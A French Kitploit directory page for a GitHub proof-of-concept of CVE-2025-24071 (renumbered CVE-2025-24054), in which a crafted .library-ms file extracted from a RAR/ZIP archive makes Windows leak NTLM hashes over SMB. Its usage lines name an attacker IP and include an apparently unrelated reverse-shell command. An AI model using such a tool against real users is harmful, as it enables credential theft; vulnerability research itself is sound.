Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24071 — Preuve de concept pour CVE-2025-24071, démontrant la fuite de hash NTLM via un fichier .library-ms conçu dans des archives RAR/ZIP, déclenchant l'authentification SMB lors de l'extraction. | Kitploit
Outils/GitHubGitHub/royall-researchers/cve-2025-24071
ReconnaissanceAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

Preuve de concept pour CVE-2025-24071, démontrant la fuite de hash NTLM via un fichier .library-ms conçu dans des archives RAR/ZIP, déclenchant l'authentification SMB lors de l'extraction.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
8il y a 1 anPas encore vérifié
Partager

CVE-2025-24071_PoC

CVE-2025-24071 : Fuite de hachage NTLM via extraction RAR/ZIP et fichier .library-ms

L'Explorateur Windows initie automatiquement une requête d'authentification SMB lorsqu'un fichier .library-ms est extrait d'une archive .rar, ce qui entraîne la divulgation du hachage NTLM. L'utilisateur n'a pas besoin d'ouvrir ou d'exécuter le fichier – le simple fait de l'extraire suffit à déclencher la fuite.

utilisation


>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

mise à jour :

Mise à jour : Microsoft a modifié son numéro CVE. Le numéro CVE précédemment défini par Microsoft, CVE-2025-24071, a été mis à jour en CVE-2025-24054.🤷‍♂

Télécharger l’outil